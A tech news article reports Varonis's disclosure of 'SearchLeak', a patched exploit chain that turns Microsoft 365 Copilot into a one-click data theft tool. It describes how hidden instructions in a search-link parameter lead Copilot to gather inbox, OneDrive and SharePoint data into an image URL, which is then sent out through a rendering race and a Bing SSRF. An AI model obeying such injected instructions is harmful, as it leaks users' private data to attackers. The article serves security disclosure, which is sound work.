Microsoft 365 Copilot can be turned into a one-click data theft tool — inbox, OneDrive, and SharePoint data all at risk, so patch now

News
By published

Varonis found a way to chain three bugs into one exploit

Caution sign data unlocking hackers. Malicious software, virus and cybercrime, System warning hacked alert, cyberattack on online network, data breach, risk of website
(Image credit: sarayut Thaneerat/ via Getty Images)
  • Varonis uncovered “SearchLeak,” chaining three flaws in Microsoft 365 Copilot to enable one‑click data theft
  • Attack exploited prompt injection, HTML race condition, and Bing SSRF to exfiltrate inbox, OneDrive, and SharePoint data
  • Microsoft patched CVE‑2026‑42824 earlier this month, rating it 10/10 critical

Experts have uncovered a way to turn Microsoft 365 Copilot into a one-click data theft tool, capable of exfiltrating sensitive information from people’s inbox, OneDrive, and SharePoint instances.

The method was recently patched by Microsoft having been developed by security researchers Varonis, who dubbed the method SearchLeak, explaining it works by chaining together three vulnerabilities.

Separately, these three can’t do much harm, but together, they are strong enough to warrant a patch.

Latest Videos From

Exfiltration proxy

The three flaws being chained are a parameter-to-prompt injection, an HTML rendering race condition, and a content-security-policy (CSP) bypass enabled by Bing server-side request forgery (SSRF).

The attack starts when a victim clicks a specially crafted Microsoft 365 Copilot Enterprise Search link. The URL holds hidden instructions in the search query parameter, telling Copilot to search the victim's emails, OneDrive files, SharePoint documents, or calendar data and include the results inside an image URL.

As Copilot generates its response, a race condition causes the browser to briefly render attacker-controlled HTML before Microsoft's sanitization process completes. This allows an image tag containing the stolen data to execute.

Finally, the image request is routed through Bing’s “Search by Image” feature, and because of the SSRF flaw, Bing can fetch the attacker-controlled URL on the victim’s behalf and bypass Content Security Policy protections. The sensitive data embedded in the URL is thus transmitted to the attacker's server, where they can recover it from web request logs

"Bing becomes an unwitting exfiltration proxy,” the researchers explained. “A classic SSRF, hiding in plain sight behind a CSP allowlist entry."

Varonis says that on the victim’s side, all they see is a normal Copilot search session, and stressed that AI has transformed simple, easily addressed vulnerabilities, such as SSRF and HTML injection race conditions, into potent vulnerabilities.

Earlier this month, Microsoft patched the flaw, assigning it a maximum severity rating (10/10 critical), and tracking it as CVE-2026-42824.

Via BleepingComputer

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Google logo on a black background next to text reading 'Click to follow TechRadar'

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.